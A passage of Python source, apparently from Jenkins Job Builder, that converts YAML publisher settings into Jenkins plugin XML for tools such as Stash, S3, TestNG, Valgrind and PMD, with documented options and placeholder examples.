for branch in branches:
xml_branch = XML.SubElement(
xml_branches,
'hudson.plugins.git.GitPublisher_-BranchToPush')
handle_entity_children(branch['branch'], xml_branch,
branch_mappings)
notes = data.get('notes', [])
if notes:
xml_notes = XML.SubElement(top, 'notesToPush')
for note in notes:
xml_note = XML.SubElement(
xml_notes,
'hudson.plugins.git.GitPublisher_-NoteToPush')
handle_entity_children(note['note'], xml_note, note_mappings)
def github_notifier(parser, xml_parent, data):
"""yaml: github-notifier
Set build status on Github commit.
Requires the Jenkins :jenkins-wiki:`Github Plugin <GitHub+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/github-notifier.yaml
:language: yaml
"""
XML.SubElement(xml_parent,
'com.cloudbees.jenkins.GitHubCommitNotifier')
def gitlab_notifier(parser, xml_parent, data):
"""yaml: gitlab-notifier
Set build status on GitLab commit.
Requires the Jenkins :jenkins-wiki:`GitLab Plugin <GitLab+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/gitlab-notifier.yaml
:language: yaml
"""
XML.SubElement(
xml_parent,
'com.dabsquared.gitlabjenkins.publisher.GitLabCommitStatusPublisher')
def zulip(parser, xml_parent, data):
"""yaml: zulip
Set build status on zulip.
Requires the Jenkins :jenkins-wiki:`Humbug Plugin <Humbug+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/zulip.yaml
:language: yaml
"""
XML.SubElement(xml_parent,
'hudson.plugins.humbug.HumbugNotifier')
def build_publisher(parser, xml_parent, data):
"""yaml: build-publisher
This plugin allows records from one Jenkins to be published
on another Jenkins.
Requires the Jenkins :jenkins-wiki:`Build Publisher Plugin
<Build+Publisher+Plugin>`.
:arg bool publish-unstable-builds: publish unstable builds (default true)
:arg bool publish-failed-builds: publish failed builds (default true)
:arg int days-to-keep: days to keep when publishing results (optional)
:arg int num-to-keep: number of jobs to keep in the published results
(optional)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/build-publisher002.yaml
:language: yaml
"""
reporter = XML.SubElement(
xml_parent,
'hudson.plugins.build__publisher.BuildPublisher')
XML.SubElement(reporter, 'publishUnstableBuilds').text = \
str(data.get('publish-unstable-builds', True)).lower()
XML.SubElement(reporter, 'publishFailedBuilds').text = \
str(data.get('publish-failed-builds', True)).lower()
if 'days-to-keep' in data or 'num-to-keep' in data:
logrotator = XML.SubElement(reporter, 'logRotator')
XML.SubElement(logrotator, 'daysToKeep').text = \
str(data.get('days-to-keep', -1))
XML.SubElement(logrotator, 'numToKeep').text = \
str(data.get('num-to-keep', -1))
# hardcoded to -1 to emulate what the build publisher
# plugin seem to do.
XML.SubElement(logrotator, 'artifactDaysToKeep').text = "-1"
XML.SubElement(logrotator, 'artifactNumToKeep').text = "-1"
def stash(parser, xml_parent, data):
"""yaml: stash
This plugin will configure the Jenkins Stash Notifier plugin to
notify Atlassian Stash after job completes.
Requires the Jenkins :jenkins-wiki:`StashNotifier Plugin
<StashNotifier+Plugin>`.
:arg string url: Base url of Stash Server (default "")
:arg string username: Username of Stash Server (default "")
:arg string password: Password of Stash Server (default "")
:arg string credentials-id: Credentials of Stash Server (optional)
:arg bool ignore-ssl: Ignore unverified SSL certificate (default false)
:arg string commit-sha1: Commit SHA1 to notify (default "")
:arg bool include-build-number: Include build number in key
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/stash001.yaml
:language: yaml
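A minimal sketch using stored credentials (the URL and credentials id are
placeholders):

.. code-block:: yaml

    publishers:
      - stash:
          url: 'https://stash.example.com'
          credentials-id: 'stash-notifier-credentials'
          ignore-ssl: false
          include-build-number: true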
"""
top = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.stashNotifier.StashNotifier')
XML.SubElement(top, 'stashServerBaseUrl').text = data.get('url', '')
if data.get('credentials-id') is not None:
XML.SubElement(top, 'credentialsId').text = str(
data.get('credentials-id'))
else:
XML.SubElement(top, 'stashUserName'
).text = helpers.get_value_from_yaml_or_config_file(
'username', 'stash', data, parser)
XML.SubElement(top, 'stashUserPassword'
).text = helpers.get_value_from_yaml_or_config_file(
'password', 'stash', data, parser)
XML.SubElement(top, 'ignoreUnverifiedSSLPeer').text = str(
data.get('ignore-ssl', False)).lower()
XML.SubElement(top, 'commitSha1').text = data.get('commit-sha1', '')
XML.SubElement(top, 'includeBuildNumberInKey').text = str(
data.get('include-build-number', False)).lower()
def dependency_check(parser, xml_parent, data):
"""yaml: dependency-check
Dependency-Check is an open source utility that identifies project
dependencies and checks if there are any known, publicly disclosed,
vulnerabilities.
Requires the Jenkins :jenkins-wiki:`OWASP Dependency-Check Plugin
<OWASP+Dependency-Check+Plugin>`.
:arg str pattern: Report filename pattern (optional)
:arg bool can-run-on-failed: Also runs for failed builds, instead of just
stable or unstable builds (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings (default false)
:arg int healthy: Sunny threshold (optional)
:arg int unhealthy: Stormy threshold (optional)
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. (optional)
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg str default-encoding: Encoding for parsing or showing files (optional)
:arg bool do-not-resolve-relative-paths: (default false)
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-previous-build-as-reference: determines whether to always
use the previous build as the reference build (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg bool use-delta-values: If set then the number of new warnings is
calculated by subtracting the total number of warnings of the current
build from the reference build.
(default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/dependency-check001.yaml
:language: yaml
"""
dependency_check = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.DependencyCheck.DependencyCheckPublisher')
# trends
helpers.build_trends_publisher(
'[DEPENDENCYCHECK] ', dependency_check, data)
def description_setter(parser, xml_parent, data):
"""yaml: description-setter
This plugin sets the description for each build,
based upon a RegEx test of the build log file.
Requires the Jenkins :jenkins-wiki:`Description Setter Plugin
<Description+Setter+Plugin>`.
:arg str regexp: A RegEx which is used to scan the build log file
:arg str regexp-for-failed: A RegEx which is used for failed builds
(optional)
:arg str description: The description to set on the build (optional)
:arg str description-for-failed: The description to set on
the failed builds (optional)
:arg bool set-for-matrix: Also set the description on
a multi-configuration build (default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/description-setter001.yaml
:language: yaml
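An illustrative snippet (the regular expression and description are
placeholders):

.. code-block:: yaml

    publishers:
      - description-setter:
          regexp: 'Deployed version ([0-9.]+)'
          description: 'Version \1'
          set-for-matrix: false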
"""
descriptionsetter = XML.SubElement(
xml_parent,
'hudson.plugins.descriptionsetter.DescriptionSetterPublisher')
XML.SubElement(descriptionsetter, 'regexp').text = data.get('regexp', '')
XML.SubElement(descriptionsetter, 'regexpForFailed').text = \
data.get('regexp-for-failed', '')
if 'description' in data:
XML.SubElement(descriptionsetter, 'description').text = \
data['description']
if 'description-for-failed' in data:
XML.SubElement(descriptionsetter, 'descriptionForFailed').text = \
data['description-for-failed']
for_matrix = str(data.get('set-for-matrix', False)).lower()
XML.SubElement(descriptionsetter, 'setForMatrix').text = for_matrix
def doxygen(parser, xml_parent, data):
"""yaml: doxygen
This plugin parses the Doxygen descriptor (Doxyfile) and provides a link to
the generated Doxygen documentation.
Requires the Jenkins :jenkins-wiki:`Doxygen Plugin <Doxygen+Plugin>`.
:arg str doxyfile: The doxyfile path
:arg str slave: The node or label to pull the doxygen HTML files from
:arg bool keep-all: Retain doxygen generation for each successful build
(default false)
:arg str folder: Folder where you run doxygen (default '')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/doxygen001.yaml
:language: yaml
"""
logger = logging.getLogger(__name__)
p = XML.SubElement(xml_parent, 'hudson.plugins.doxygen.DoxygenArchiver')
if not data.get('doxyfile'):
raise JenkinsJobsException('The path to a doxyfile must be specified.')
XML.SubElement(p, 'doxyfilePath').text = str(data.get('doxyfile'))
XML.SubElement(p, 'runOnChild').text = str(data.get('slave', ''))
# backward compatibility
if 'keepall' in data:
if 'keep-all' in data:
XML.SubElement(p, 'keepAll').text = str(
data.get('keep-all', False)).lower()
logger.warn("The value of 'keepall' will be ignored "
"in preference to 'keep-all'.")
else:
XML.SubElement(p, 'keepAll').text = str(
data.get('keepall', False)).lower()
logger.warn("'keepall' is deprecated please use 'keep-all'")
else:
XML.SubElement(p, 'keepAll').text = str(
data.get('keep-all', False)).lower()
XML.SubElement(p, 'folderWhereYouRunDoxygen').text = str(
data.get('folder', ''))
def sitemonitor(parser, xml_parent, data):
"""yaml: sitemonitor
This plugin checks the availability of a URL.
It requires the :jenkins-wiki:`sitemonitor plugin <SiteMonitor+Plugin>`.
:arg list sites: List of URLs to check
Example:
.. literalinclude:: /../../tests/publishers/fixtures/sitemonitor001.yaml
:language: yaml
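An illustrative snippet (the URLs are placeholders):

.. code-block:: yaml

    publishers:
      - sitemonitor:
          sites:
            - url: 'http://example.com/healthcheck'
            - url: 'http://example.com/api/status'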
"""
mon = XML.SubElement(xml_parent,
'hudson.plugins.sitemonitor.SiteMonitorRecorder')
if data.get('sites'):
sites = XML.SubElement(mon, 'mSites')
for siteurl in data.get('sites'):
site = XML.SubElement(sites,
'hudson.plugins.sitemonitor.model.Site')
XML.SubElement(site, 'mUrl').text = siteurl['url']
def testng(parser, xml_parent, data):
"""yaml: testng
This plugin publishes TestNG test reports.
Requires the Jenkins :jenkins-wiki:`TestNG Results Plugin <testng-plugin>`.
:arg str pattern: filename pattern to locate the TestNG XML report files
(required)
:arg bool escape-test-description: escapes the description string
associated with the test method while displaying test method details
(default true)
:arg bool escape-exception-msg: escapes the test method's exception
messages. (default true)
:arg bool fail-on-failed-test-config: Allows for a distinction between
failing tests and failing configuration methods (>=1.10) (default
false)
:arg bool show-failed-builds: include results from failed builds in the
trend graph (>=1.6) (default false)
:arg int unstable-skips: Build is marked UNSTABLE if the number/percentage
of skipped tests exceeds the specified threshold (>=1.11) (default 100)
:arg int unstable-fails: Build is marked UNSTABLE if the number/percentage
of failed tests exceeds the specified threshold (>=1.11) (default 0)
:arg int failed-skips: Build is marked FAILURE if the number/percentage of
skipped tests exceeds the specified threshold (>=1.11) (default 100)
:arg int failed-fails: Build is marked FAILURE if the number/percentage of
failed tests exceeds the specified threshold (>=1.11) (default 100)
:arg str threshold-mode: Interpret threshold as number of tests or
percentage of tests (>=1.11) (default percentage)
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/testng-full.yaml
:language: yaml
Minimal Example:
.. literalinclude:: /../../tests/publishers/fixtures/testng-minimal.yaml
:language: yaml
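For orientation, an inline sketch (the report pattern is a placeholder):

.. code-block:: yaml

    publishers:
      - testng:
          pattern: '**/testng-results.xml'
          show-failed-builds: true
          threshold-mode: number
          failed-fails: 1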
"""
reporter = XML.SubElement(xml_parent, 'hudson.plugins.testng.Publisher')
reporter.set('plugin', 'testng-plugin')
valid_threshold_modes = ['number', 'percentage']
threshold_mode = data.get('threshold-mode', 'percentage')
mappings = [
('pattern', 'reportFilenamePattern', None),
('escape-test-description', 'escapeTestDescp', True),
('escape-exception-msg', 'escapeExceptionMsg', True),
('fail-on-failed-test-config', 'failureOnFailedTestConfig', False),
('show-failed-builds', 'showFailedBuilds', False),
('unstable-skips', 'unstableSkips', 100),
('unstable-fails', 'unstableFails', 0),
('failed-skips', 'failedSkips', 100),
('failed-fails', 'failedFails', 100),
]
helpers.convert_mapping_to_xml(
reporter, data, mappings, fail_required=True)
if threshold_mode == 'number':
XML.SubElement(reporter, 'thresholdMode').text = str(1)
elif threshold_mode == 'percentage':
XML.SubElement(reporter, 'thresholdMode').text = str(2)
else:
raise InvalidAttributeError(
'threshold-mode', threshold_mode, valid_threshold_modes)
def artifact_deployer(parser, xml_parent, data):
"""yaml: artifact-deployer
This plugin makes it possible to copy artifacts to remote locations.
Requires the Jenkins :jenkins-wiki:`ArtifactDeployer Plugin
<ArtifactDeployer+Plugin>`.
:arg list entries:
:entries:
* **files** (`str`) - files to deploy
* **basedir** (`str`) - the dir from which files are deployed
* **excludes** (`str`) - the mask to exclude files
* **remote** (`str`) - a remote output directory
* **flatten** (`bool`) - ignore the source directory structure
(default false)
* **delete-remote** (`bool`) - clean-up remote directory
before deployment (default false)
* **delete-remote-artifacts** (`bool`) - delete remote artifacts
when the build is deleted (default false)
* **fail-no-files** (`bool`) - fail build if there are no files
(default false)
* **groovy-script** (`str`) - execute a Groovy script
before a build is deleted
:arg bool deploy-if-fail: Deploy if the build is failed (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/artifact-dep.yaml
:language: yaml
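An illustrative entry (the file globs and remote directory are
placeholders):

.. code-block:: yaml

    publishers:
      - artifact-deployer:
          entries:
            - files: 'dist/*.tar.gz'
              basedir: 'build'
              remote: '/var/www/releases/${JOB_NAME}'
              flatten: true
              fail-no-files: true
          deploy-if-fail: false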
"""
deployer = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.artifactdeployer.'
'ArtifactDeployerPublisher')
if data is None or 'entries' not in data:
raise Exception('entries field is missing')
elif data.get('entries', None) is None:
entries = XML.SubElement(deployer, 'entries', {'class': 'empty-list'})
else:
entries = XML.SubElement(deployer, 'entries')
for entry in data.get('entries'):
deployer_entry = XML.SubElement(
entries,
'org.jenkinsci.plugins.artifactdeployer.ArtifactDeployerEntry')
XML.SubElement(deployer_entry, 'includes').text = \
entry.get('files')
XML.SubElement(deployer_entry, 'basedir').text = \
entry.get('basedir')
XML.SubElement(deployer_entry, 'excludes').text = \
entry.get('excludes')
XML.SubElement(deployer_entry, 'remote').text = entry.get('remote')
XML.SubElement(deployer_entry, 'flatten').text = \
str(entry.get('flatten', False)).lower()
XML.SubElement(deployer_entry, 'deleteRemote').text = \
str(entry.get('delete-remote', False)).lower()
XML.SubElement(deployer_entry, 'deleteRemoteArtifacts').text = \
str(entry.get('delete-remote-artifacts', False)).lower()
XML.SubElement(deployer_entry, 'failNoFilesDeploy').text = \
str(entry.get('fail-no-files', False)).lower()
XML.SubElement(deployer_entry, 'groovyExpression').text = \
entry.get('groovy-script')
deploy_if_fail = str(data.get('deploy-if-fail', False)).lower()
XML.SubElement(deployer, 'deployEvenBuildFail').text = deploy_if_fail
def s3(parser, xml_parent, data):
"""yaml: s3
Upload build artifacts to Amazon S3.
Requires the Jenkins :jenkins-wiki:`S3 plugin <S3+Plugin>`.
:arg str s3-profile: Globally-defined S3 profile to use
:arg list entries:
:entries:
* **destination-bucket** (`str`) - Destination S3 bucket
* **source-files** (`str`) - Source files (Ant glob syntax)
* **storage-class** (`str`) - S3 storage class; one of "STANDARD"
or "REDUCED_REDUNDANCY"
* **bucket-region** (`str`) - S3 bucket region (capitalized with
underscores)
* **upload-on-failure** (`bool`) - Upload files even if the build
failed (default false)
* **upload-from-slave** (`bool`) - Perform the upload directly from
the Jenkins slave rather than the master node. (default false)
* **managed-artifacts** (`bool`) - Let Jenkins fully manage the
published artifacts, similar to when artifacts are published to
the Jenkins master. (default false)
* **s3-encryption** (`bool`) - Use S3 AES-256 server side encryption
support. (default false)
* **flatten** (`bool`) - Ignore the directory structure of the
artifacts in the source project and copy all matching artifacts
directly into the specified bucket. (default false)
:arg list metadata-tags:
:metadata-tags:
* **key** Metadata key for files from this build. It will be
prefixed by "x-amz-meta-" when uploaded to S3. Can contain macros
(e.g. environment variables).
* **value** Metadata value associated with the key. Can contain macros.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/s3001.yaml
:language: yaml
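An illustrative configuration (the profile name, bucket and region are
placeholders):

.. code-block:: yaml

    publishers:
      - s3:
          s3-profile: 'my-profile'
          entries:
            - destination-bucket: 'my-bucket/builds'
              source-files: 'dist/**'
              storage-class: 'STANDARD'
              bucket-region: 'US_EAST_1'
              managed-artifacts: true
          metadata-tags:
            - key: 'build'
              value: '${BUILD_NUMBER}'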
"""
deployer = XML.SubElement(xml_parent,
'hudson.plugins.s3.S3BucketPublisher')
if data is None or not data.get('entries'):
raise JenkinsJobsException('No filesets defined.')
XML.SubElement(deployer, 'profileName').text = data.get('s3-profile')
entries = XML.SubElement(deployer, 'entries')
for entry in data.get('entries'):
fileset = XML.SubElement(entries, 'hudson.plugins.s3.Entry')
# xml keys -> yaml keys
settings = [('bucket', 'destination-bucket', ''),
('sourceFile', 'source-files', ''),
('storageClass', 'storage-class', ''),
('selectedRegion', 'bucket-region', ''),
('noUploadOnFailure', 'upload-on-failure', False),
('uploadFromSlave', 'upload-from-slave', False),
('managedArtifacts', 'managed-artifacts', False),
('useServerSideEncryption', 's3-encryption', False),
('flatten', 'flatten', False)]
for xml_key, yaml_key, default in settings:
xml_config = XML.SubElement(fileset, xml_key)
config_value = entry.get(yaml_key, default)
if xml_key == 'noUploadOnFailure':
xml_config.text = str(not config_value).lower()
elif isinstance(default, bool):
xml_config.text = str(config_value).lower()
else:
xml_config.text = str(config_value)
metadata = XML.SubElement(deployer, 'userMetadata')
for tag in data.get('metadata-tags', []):
pair = XML.SubElement(metadata, 'hudson.plugins.s3.MetadataPair')
XML.SubElement(pair, 'key').text = tag.get('key')
XML.SubElement(pair, 'value').text = tag.get('value')
def ruby_metrics(parser, xml_parent, data):
"""yaml: ruby-metrics
    Rcov plugin parses rcov html report files and
    shows them in Jenkins with a trend graph.
Requires the Jenkins :jenkins-wiki:`Ruby metrics plugin
<RubyMetrics+plugin>`.
:arg str report-dir: Relative path to the coverage report directory
    :arg dict target:
        :target: (total-coverage, code-coverage)
* **healthy** (`int`): Healthy threshold
* **unhealthy** (`int`): Unhealthy threshold
* **unstable** (`int`): Unstable threshold
Example:
.. literalinclude:: /../../tests/publishers/fixtures/ruby-metrics.yaml
:language: yaml
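    An illustrative sketch of the ``target`` option handled below (threshold
    numbers are arbitrary placeholders):

    .. code-block:: yaml

        publishers:
          - ruby-metrics:
              # illustrative placeholder values only
              report-dir: coverage/rcov
              target:
                - total-coverage:
                    healthy: 80
                    unhealthy: 60
                    unstable: 40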
"""
metrics = XML.SubElement(
xml_parent,
'hudson.plugins.rubyMetrics.rcov.RcovPublisher')
report_dir = data.get('report-dir', '')
XML.SubElement(metrics, 'reportDir').text = report_dir
targets = XML.SubElement(metrics, 'targets')
if 'target' in data:
for t in data['target']:
if not ('code-coverage' in t or 'total-coverage' in t):
raise JenkinsJobsException('Unrecognized target name')
el = XML.SubElement(
targets,
'hudson.plugins.rubyMetrics.rcov.model.MetricTarget')
if 'total-coverage' in t:
XML.SubElement(el, 'metric').text = 'TOTAL_COVERAGE'
else:
XML.SubElement(el, 'metric').text = 'CODE_COVERAGE'
for threshold_name, threshold_value in \
next(iter(t.values())).items():
elname = threshold_name.lower()
XML.SubElement(el, elname).text = str(threshold_value)
else:
raise JenkinsJobsException('Coverage metric targets must be set')
def fitnesse(parser, xml_parent, data):
"""yaml: fitnesse
Publish Fitnesse test results
Requires the Jenkins :jenkins-wiki:`Fitnesse plugin <Fitnesse+Plugin>`.
:arg str results: path specifier for results files
Example:
.. literalinclude:: /../../tests/publishers/fixtures/fitnesse001.yaml
:language: yaml
"""
fitnesse = XML.SubElement(
xml_parent,
'hudson.plugins.fitnesse.FitnesseResultsRecorder')
results = data.get('results', '')
XML.SubElement(fitnesse, 'fitnessePathToXmlResultsIn').text = results
def valgrind(parser, xml_parent, data):
"""yaml: valgrind
This plugin publishes Valgrind Memcheck XML results.
Requires the Jenkins :jenkins-wiki:`Valgrind Plugin <Valgrind+Plugin>`.
:arg str pattern: Filename pattern to locate the Valgrind XML report files
(required)
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. All threshold values are optional.
:thresholds:
* **unstable** (`dict`)
:unstable: * **invalid-read-write** (`int`)
* **definitely-lost** (`int`)
* **total** (`int`)
* **failed** (`dict`)
:failed: * **invalid-read-write** (`int`)
* **definitely-lost** (`int`)
* **total** (`int`)
:arg bool fail-no-reports: Fail build if no reports are found
(default false)
:arg bool fail-invalid-reports: Fail build if reports are malformed
(default false)
:arg bool publish-if-aborted: Publish results for aborted builds
(default false)
:arg bool publish-if-failed: Publish results for failed builds
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/valgrind001.yaml
:language: yaml
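    An illustrative sketch (the pattern and threshold numbers are
    placeholders):

    .. code-block:: yaml

        publishers:
          - valgrind:
              # illustrative placeholder values only
              pattern: '**/valgrind.xml'
              thresholds:
                unstable:
                  invalid-read-write: 0
                  definitely-lost: 0
                failed:
                  total: 10
              fail-no-reports: true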
"""
p = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.valgrind.ValgrindPublisher')
p = XML.SubElement(p, 'valgrindPublisherConfig')
if 'pattern' not in data:
raise JenkinsJobsException("A filename pattern must be specified.")
XML.SubElement(p, 'pattern').text = data['pattern']
dthresholds = data.get('thresholds', {})
for threshold in ['unstable', 'failed']:
dthreshold = dthresholds.get(threshold, {})
threshold = threshold.replace('failed', 'fail')
XML.SubElement(p, '%sThresholdInvalidReadWrite' % threshold).text \
= str(dthreshold.get('invalid-read-write', ''))
XML.SubElement(p, '%sThresholdDefinitelyLost' % threshold).text \
= str(dthreshold.get('definitely-lost', ''))
XML.SubElement(p, '%sThresholdTotal' % threshold).text \
= str(dthreshold.get('total', ''))
XML.SubElement(p, 'failBuildOnMissingReports').text = str(
data.get('fail-no-reports', False)).lower()
XML.SubElement(p, 'failBuildOnInvalidReports').text = str(
data.get('fail-invalid-reports', False)).lower()
XML.SubElement(p, 'publishResultsForAbortedBuilds').text = str(
data.get('publish-if-aborted', False)).lower()
XML.SubElement(p, 'publishResultsForFailedBuilds').text = str(
data.get('publish-if-failed', False)).lower()
def pmd(parser, xml_parent, data):
"""yaml: pmd
Publish trend reports with PMD.
Requires the Jenkins :jenkins-wiki:`PMD Plugin <PMD+Plugin>`.
The PMD component accepts a dictionary with the following values:
:arg str pattern: Report filename pattern (optional)
:arg bool can-run-on-failed: Also runs for failed builds, instead of just
stable or unstable builds (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings (default false)
:arg int healthy: Sunny threshold (optional)
:arg int unhealthy: Stormy threshold (optional)
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. (optional)
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg str default-encoding: Encoding for parsing or showing files (optional)
:arg bool do-not-resolve-relative-paths: (default false)
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-previous-build-as-reference: determines whether to always
use the previous build as the reference build (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg bool use-delta-values: If set then the number of new warnings is
calculated by subtracting the total number of warnings of the current
build from the reference build.
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/pmd001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/pmd002.yaml
:language: yaml
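    An illustrative sketch combining a few of the options above (values are
    placeholders):

    .. code-block:: yaml

        publishers:
          - pmd:
              # illustrative placeholder values only
              pattern: '**/pmd.xml'
              can-run-on-failed: true
              health-threshold: high
              thresholds:
                unstable:
                  total-high: 10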
"""
xml_element = XML.SubElement(xml_parent, 'hudson.plugins.pmd.PmdPublisher')
helpers.build_trends_publisher('[PMD] ', xml_element, data)
def scan_build(parser, xml_parent, data):
"""yaml: scan-build
Publishes results from the Clang scan-build static analyzer.
The scan-build report has to be generated in the directory
``${WORKSPACE}/clangScanBuildReports`` for the publisher to find it.
Requires the Jenkins :jenkins-wiki:`Clang Scan-Build Plugin
<Clang+Scan-Build+Plugin>`.
:arg bool mark-unstable: Mark build as unstable if the number of bugs
exceeds a threshold (default false)
:arg int threshold: Threshold for marking builds as unstable (default 0)
:arg string exclude-paths: Comma separated paths to exclude from reports
(>=1.5) (default '')
:arg string report-folder: Folder where generated reports are located
(>=1.7) (default 'clangScanBuildReports')
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/scan-build-full.yaml
:language: yaml
Minimal Example:
.. literalinclude::
/../../tests/publishers/fixtures/scan-build-minimal.yaml
:language: yaml
"""
p = XML.SubElement(
xml_parent,
'jenkins.plugins.clangscanbuild.publisher.ClangScanBuildPublisher')
p.set('plugin', 'clang-scanbuild')
mappings = [
('mark-unstable', 'markBuildUnstableWhenThresholdIsExceeded', False),
('threshold', 'bugThreshold', 0),
('exclude-paths', 'clangexcludedpaths', ''),
('report-folder', 'reportFolderName', 'clangScanBuildReports'),
]
helpers.convert_mapping_to_xml(p, data, mappings, fail_required=True)
def dry(parser, xml_parent, data):
"""yaml: dry
Publish trend reports with DRY.
Requires the Jenkins :jenkins-wiki:`DRY Plugin <DRY+Plugin>`.
The DRY component accepts a dictionary with the following values:
:arg str pattern: Report filename pattern (default '')
:arg bool can-run-on-failed: Also runs for failed builds, instead of just
stable or unstable builds (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings (default false)
:arg int healthy: Sunny threshold (default '')
:arg int unhealthy: Stormy threshold (default '')
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg int high-threshold: Minimum number of duplicated lines for high
priority warnings. (default 50)
:arg int normal-threshold: Minimum number of duplicated lines for normal
priority warnings. (default 25)
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. (default '')
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg str default-encoding: Encoding for parsing or showing files (optional)
:arg bool do-not-resolve-relative-paths: (default false)
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-previous-build-as-reference: determines whether to always
use the previous build as the reference build (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg bool use-delta-values: If set then the number of new warnings is
calculated by subtracting the total number of warnings of the current
build from the reference build. (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/dry001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/dry004.yaml
:language: yaml
"""
xml_element = XML.SubElement(xml_parent, 'hudson.plugins.dry.DryPublisher')
helpers.build_trends_publisher('[DRY] ', xml_element, data)
# Add specific settings for this trends publisher
settings = [
('high-threshold', 'highThreshold', 50),
('normal-threshold', 'normalThreshold', 25)]
helpers.convert_mapping_to_xml(
xml_element, data, settings, fail_required=True)
def shining_panda(parser, xml_parent, data):
"""yaml: shining-panda
Publish coverage.py results. Requires the Jenkins
:jenkins-wiki:`ShiningPanda Plugin <ShiningPanda+Plugin>`.
:arg str html-reports-directory: path to coverage.py html results
(optional)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/shiningpanda001.yaml
:language: yaml
"""
shining_panda_plugin = XML.SubElement(
xml_parent,
'jenkins.plugins.shiningpanda.publishers.CoveragePublisher')
if 'html-reports-directory' in data:
XML.SubElement(shining_panda_plugin, 'htmlDir').text = str(
data['html-reports-directory'])
def downstream_ext(parser, xml_parent, data):
"""yaml: downstream-ext
Trigger multiple downstream jobs when a job is completed and
condition is met.
Requires the Jenkins :jenkins-wiki:`Downstream-Ext Plugin
<Downstream-Ext+Plugin>`.
:arg list projects: Projects to build (required)
:arg string condition: comparison condition used for the criteria.
One of 'equal-or-over', 'equal-or-under', 'equal'
(default 'equal-or-over')
:arg string criteria: Trigger downstream job if build results meets
condition. One of 'success', 'unstable', 'failure' or
'aborted' (default 'success')
:arg bool only-on-scm-change: Trigger only if downstream project
has SCM changes (default false)
:arg bool only-on-local-scm-change: Trigger only if current project
has SCM changes (default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/downstream-ext002.yaml
:language: yaml
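    An illustrative sketch (project names are placeholders):

    .. code-block:: yaml

        publishers:
          - downstream-ext:
              # illustrative placeholder values only
              projects:
                - foo-integration
                - foo-deploy
              condition: equal-or-over
              criteria: success
              only-on-scm-change: true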
"""
conditions = {
"equal-or-over": "AND_HIGHER",
"equal-or-under": "AND_LOWER",
"equal": "EXACT"
}
p = XML.SubElement(xml_parent,
'hudson.plugins.downstream__ext.DownstreamTrigger')
if 'projects' not in data:
raise JenkinsJobsException("Missing list of downstream projects.")
XML.SubElement(p, 'childProjects').text = ','.join(data['projects'])
th = XML.SubElement(p, 'threshold')
criteria = data.get('criteria', 'success').upper()
